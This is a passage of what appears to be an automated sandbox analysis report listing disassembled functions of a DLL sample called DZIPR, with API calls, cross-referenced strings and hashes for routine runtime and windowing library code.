HeapFree.KERNEL32(00000000,00000000,6C55E828,0000000C,6C54A270,00000000,?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C), ref: 6C544680
GetLastError.KERNEL32(?,6C54A5D4,00000000,00000001,00000000,?,6C54A89E,00000018,6C55E978,0000000C,6C54A92F,00000000,00000000,?,6C54A32A,0000000D), ref: 6C544691

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 6324808383810470a7ebb301a1e41bc6e0c8e15f2d9ae87e1955bb9bce2e6e8f
Instruction ID: cb19702800f9ad3af3779d5032ff837c55c45aff0566f51efb7194b21503303b
Opcode Fuzzy Hash: 6324808383810470a7ebb301a1e41bc6e0c8e15f2d9ae87e1955bb9bce2e6e8f
Instruction Fuzzy Hash: 1A01F431985715EBEF205FB19C08B9E3B749F4272AFB1C119E014BAA90CB78D944CB99

Function 6C53C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6C53C179), ref: 6C53C13B
GlobalHandle.KERNEL32(?), ref: 6C53C149
GlobalUnlock.KERNEL32(00000000), ref: 6C53C152
GlobalFree.KERNEL32(00000000), ref: 6C53C159
RtlDeleteCriticalSection.NTDLL ref: 6C53C163

Part of subcall function 6C53BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C53BFBC
Part of subcall function 6C53BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BFCC
Part of subcall function 6C53BF5D: LocalFree.KERNEL32(?), ref: 6C53BFD5
Part of subcall function 6C53BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C53BFE7

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 4ebf31c8de507c79b72e92fda8916e4ffeac018bea662d2e61a1e27eeed3f680
Instruction ID: 41d0211ebf71896d573cdae9a70beeeafcd7cd3b21ac917513f5084d2bf9a4ee
Opcode Fuzzy Hash: 4ebf31c8de507c79b72e92fda8916e4ffeac018bea662d2e61a1e27eeed3f680
Instruction Fuzzy Hash: 5DF08236351A209BDB106B389C4CE1B37B9AFC66647A61709F529D3641EB30E8038B79

Function 6C5396DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6C5396F2
_memset.LIBCMT ref: 6C53976A
LoadBitmapW.USER32(00000000,00007FE3), ref: 6C5397E5

Strings

, xrefs: 6C53974B

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: BitmapCheckDimensionsLoadMarkMenu_memset
String ID:
API String ID: 3130454499-3916222277
Opcode ID: 8cce85264133c8ead5a01c255ecc33b228f9823961638ab54ff1108a37a037f5
Instruction ID: f19a0f79bb97e452108395271d093f085d6c3b1e3c9d6bf7f4ce0a37ff7e3930
Opcode Fuzzy Hash: 8cce85264133c8ead5a01c255ecc33b228f9823961638ab54ff1108a37a037f5
Instruction Fuzzy Hash: 823105B1B002259BEF108F689CC9BA97BB4FB45308F5540AAE549EB2C1EF309D498F50

Function 6C54FA07 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6C54FA29
__calloc_crt.LIBCMT ref: 6C54FA42

Strings

$Vl, xrefs: 6C54FA6E
}Vl, xrefs: 6C54FA59

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __calloc_crt
String ID: $Vl$ }Vl
API String ID: 3494438863-1179181909
Opcode ID: 545d1496f748d5069160ff75c9f603404445fab0877e65e82821298b8da79b8a
Instruction ID: eb7c9c15f0c3fe5238345235e05ff92bd24f0dfb3bd90d7cfe253d59c345f3ba
Opcode Fuzzy Hash: 545d1496f748d5069160ff75c9f603404445fab0877e65e82821298b8da79b8a
Instruction Fuzzy Hash: 511102327492118BF714CE1FAC507A533F5EBCA378B29872AE210CBBA0E730D8814259

Function 6C54C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6C54C7D6

Part of subcall function 6C54C731: ___BuildCatchObjectHelper.LIBCMT ref: 6C54C767

_UnwindNestedFrames.LIBCMT ref: 6C54C7ED
___FrameUnwindToState.LIBCMT ref: 6C54C7FB

Strings

csm, xrefs: 6C54C7D2, 6C54C7E7, 6C54C7FA, 6C54C818, 6C54C828

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: 577c6b5635fe870d6dba775691e779a30cf482fb2e654b790f410383bf85a7b8
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: 4901E432041109FBDF126E51CD84EEA7F6AEF99358F108014BD1855A20DB32A9B9EBA1

Function 6C54ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6C5477D7), ref: 6C54ED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C54ED8C

Strings

IsProcessorFeaturePresent, xrefs: 6C54ED86
KERNEL32, xrefs: 6C54ED77

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a1f662c107b31ef60b0de7273b3cc11d2bd3e371e0ba03201a6c6efccc6b8f59
Instruction ID: c2762ef1b8a68abb88a2b685de755d3cc5faf0464c74f019e60fc0d1c3fcdba3
Opcode Fuzzy Hash: a1f662c107b31ef60b0de7273b3cc11d2bd3e371e0ba03201a6c6efccc6b8f59
Instruction Fuzzy Hash: F6F03030A40A09D2DF005BA1AD1976FBE79BB82756FC20994E196A0484DF7080B493DA

Function 6C55053C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6C55054E

Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(00000000), ref: 6C550426
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550433
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550440
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55044D
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55045A
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550476
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C550486
Part of subcall function 6C550414: InterlockedIncrement.KERNEL32(?), ref: 6C55049C

___removelocaleref.LIBCMT ref: 6C550559

Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(00000000), ref: 6C5504BD
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504CA
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504D7
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504E4
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C5504F1
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C55050D
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C55051D
Part of subcall function 6C5504A3: InterlockedDecrement.KERNEL32(?), ref: 6C550533

___freetlocinfo.LIBCMT ref: 6C55056D

Part of subcall function 6C5502CB: ___free_lconv_mon.LIBCMT ref: 6C550311
Part of subcall function 6C5502CB: ___free_lconv_num.LIBCMT ref: 6C550332
Part of subcall function 6C5502CB: ___free_lc_time.LIBCMT ref: 6C5503B7

Strings

P)Vl, xrefs: 6C550564

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: P)Vl
API String ID: 467427115-1966111344
Opcode ID: e95af68279bffe8a97cb0d55f0742fe22e37657ae8075ea4aa5d02fd730f2249
Instruction ID: acc0b10d8ce90267d90969eb2241c2eea3406d1d7c16c153d17aaef693470854
Opcode Fuzzy Hash: e95af68279bffe8a97cb0d55f0742fe22e37657ae8075ea4aa5d02fd730f2249
Instruction Fuzzy Hash: 01E02032D038A1C1CF311938BC902BD12944FC157CBF10117E860E7D4DDB208EA16095

Function 6C537D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C537D88
GetFileTime.KERNEL32(?,?,?,?), ref: 6C537DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6C537DD7

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: dabddd06919713192a1652419da99a423e9dd023dffdbd304c04083a1b26b06e
Instruction ID: a7c41c587712fdf9f942bcc3673fe9a2a8adfdede1dbd0ed463e860af4037e75
Opcode Fuzzy Hash: dabddd06919713192a1652419da99a423e9dd023dffdbd304c04083a1b26b06e
Instruction Fuzzy Hash: D1510B71904615DFDB20CF69CD4099ABBF8FB49364B108A1EE4AAD3A90F730E944CB64

Function 6C55081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55084F
__isleadbyte_l.LIBCMT ref: 6C550883
MultiByteToWideChar.KERNEL32(00000080,00000009,6C5440D8,6C55BF84,00000000,00000000,?,?,?,?,6C5440D8,00000000,?), ref: 6C5508B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6C5440D8,00000001,00000000,00000000,?,?,?,?,6C5440D8,00000000,?), ref: 6C550922

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 369870d6e478f33160ce54c7aa4e0cbe7b7552352ec550d3afa5f3bf25afbdf8
Instruction ID: 8703aebca2e6835e29dbcaf66a37ca34d53754edc4709865fac64fa532c79923
Opcode Fuzzy Hash: 369870d6e478f33160ce54c7aa4e0cbe7b7552352ec550d3afa5f3bf25afbdf8
Instruction Fuzzy Hash: 7831DF31A01289EFDB10CF64CC80EAE3BB5BF8131CB9585ABE4649B591DB70D960DB90

Function 6C53C4CF Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 6C53C562
__msize.LIBCMT ref: 6C53C585
_malloc.LIBCMT ref: 6C53C59D
_malloc.LIBCMT ref: 6C53C5B2

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 4418a23d68716759870ba2ccc90ba4d1ed3a2b91bf1739a207bedc299e15f643
Instruction ID: 14c3cad3c9106ad9606e310c64ef40dcff9ffde45a62acffa36d510d0f89a7be
Opcode Fuzzy Hash: 4418a23d68716759870ba2ccc90ba4d1ed3a2b91bf1739a207bedc299e15f643
Instruction Fuzzy Hash: 54215271101630DBCB15AF34DC84A9A7BA5AF81758B20961AD82C8BA56FF30FC44CAA4

Function 6C5388C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6C5388E7
lstrcmpW.KERNEL32(00000000,?), ref: 6C5388F4
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C53892E
GlobalLock.KERNEL32(00000000), ref: 6C538938

Part of subcall function 6C53DAD1: GlobalFlags.KERNEL32(?), ref: 6C53DAE0
Part of subcall function 6C53DAD1: GlobalUnlock.KERNEL32(?), ref: 6C53DAF2
Part of subcall function 6C53DAD1: GlobalFree.KERNEL32(?), ref: 6C53DAFD

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
String ID:
API String ID: 2391069079-0
Opcode ID: f78218a98e4be3ba70370e58e928556c0d885d03b5749e71765eb3bb8c57a7d5
Instruction ID: a2ca4acf97305a3a116ae8bf613e9aad72e4b2279c1456a742a8d8396414144d
Opcode Fuzzy Hash: f78218a98e4be3ba70370e58e928556c0d885d03b5749e71765eb3bb8c57a7d5
Instruction Fuzzy Hash: 37116A72600604FACB129BA5CC48DAF7BBDFBC5B18B90041AFA09D6920EB31D914D722

Function 6C53BF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 6C53BFBC
RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BFCC
LocalFree.KERNEL32(?), ref: 6C53BFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6C53BFE7

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: a09c05574e4989a69fe6aed47aec8c052ef1328561b4ffabab52f4cd587e83f4
Instruction ID: b19b820593d38fbbec5e9cbf0cde99880032e0d80d114af8295774718aa79ea9
Opcode Fuzzy Hash: a09c05574e4989a69fe6aed47aec8c052ef1328561b4ffabab52f4cd587e83f4
Instruction Fuzzy Hash: 52116771601A14EFD714DF58CC84F6AB7B4FF46319F20A42AF16A8BAA1DB71A840CF10

Function 6C538EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C538ED0

Part of subcall function 6C539C7C: __EH_prolog3.LIBCMT ref: 6C539C83

__wcsdup.LIBCMT ref: 6C538EF2
GetCurrentThread.KERNEL32 ref: 6C538F1F
GetCurrentThreadId.KERNEL32 ref: 6C538F28

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 879be1f87e798ebec64e3ad4d358ec12f75b67c90dcc37c893019ef5b8ece092
Instruction ID: 63c9ced782ca4a3677a6094e2a2e19e483794b040fb7677b6e373c6fe780f600
Opcode Fuzzy Hash: 879be1f87e798ebec64e3ad4d358ec12f75b67c90dcc37c893019ef5b8ece092
Instruction Fuzzy Hash: B9216AB0941B54CFC7218F6A894568AFBF8BFA4704B50991FD1AAC7B21DBB0A444CF46

Function 6C541D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C541D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C541D5E
GetCapture.USER32 ref: 6C541D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C541D7F

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 1a23527b5607d6898030e1d3693d707ac03772dc85ecdb2424498d4fb23357d1
Instruction ID: 9b42876b683f17bec0aa157d9f931c2b2ae43bdc54960899a3aefbc1f2a7bb9a
Opcode Fuzzy Hash: 1a23527b5607d6898030e1d3693d707ac03772dc85ecdb2424498d4fb23357d1
Instruction Fuzzy Hash: 550121713502947BDF315B628CCDFDB3E7ADBCAB10F150079B6059A1A6CAA18854DA20

Function 6C536A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C536A8A

Part of subcall function 6C5368E2: _malloc.LIBCMT ref: 6C536900

__CxxThrowException@8.LIBCMT ref: 6C536AC0
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C5316A6,00000000,00000000,?,?,6C55D898,00000004,6C5316A6,00000000,6C5369F9,00000000), ref: 6C536AEA
LocalFree.KERNEL32(6C5316A6,6C5316A6,00000000,6C5369F9,00000000), ref: 6C536B12

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: 744afc6de14b4ae3254231290ed695e4287e017bc00dfdf24b613319aa60b652
Instruction ID: 91ecefc2ab6eaf61c9dfec35b2f06be71928efa07c1dcbb0125e8a192de8eee8
Opcode Fuzzy Hash: 744afc6de14b4ae3254231290ed695e4287e017bc00dfdf24b613319aa60b652
Instruction Fuzzy Hash: C5115E71640359EFDF04DF68CC409A93BB5FF88314F60C929F529CA6A0EB3189508B54

Function 6C53D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C53D194
RegCloseKey.ADVAPI32(00000000), ref: 6C53D19D
swprintf.LIBCMT ref: 6C53D1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C53D1CB

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: fd6c587b6df0635d9d03aae504cd13ec738be10442905cf245600e17a5d2944a
Instruction ID: 6b457326f0396c9ce4a97cde7bac59055c16bb5b3cf2abe676912822bf37eee1
Opcode Fuzzy Hash: fd6c587b6df0635d9d03aae504cd13ec738be10442905cf245600e17a5d2944a
Instruction Fuzzy Hash: F901AD72650318BBDB009A68CC85FAF77BCAF8A708F51041AF901A7640EB74ED0887A4

Function 6C537287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6C5368E2: _malloc.LIBCMT ref: 6C536900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C5372BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6C5372C1
DuplicateHandle.KERNEL32(00000000), ref: 6C5372C4
GetLastError.KERNEL32(?), ref: 6C5372DF

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: 9aa172bc481465855ff228e0f005d7a9bf8618cc46cf24b1585d51bdc5fda1c7
Instruction ID: fa0dc09aa0aa94ca8da94a10c6eccb70ce3284d6f0ca55d426a5bebc0638797c
Opcode Fuzzy Hash: 9aa172bc481465855ff228e0f005d7a9bf8618cc46cf24b1585d51bdc5fda1c7
Instruction Fuzzy Hash: 82017131B40615EBDB009BA6CD89F5A7BA9EFC5794F254415F908CB641EF71DC008B64

Function 6C540F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6C540F9D
GetTopWindow.USER32(00000000), ref: 6C540FDC
GetWindow.USER32(00000000,00000002), ref: 6C540FFA

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

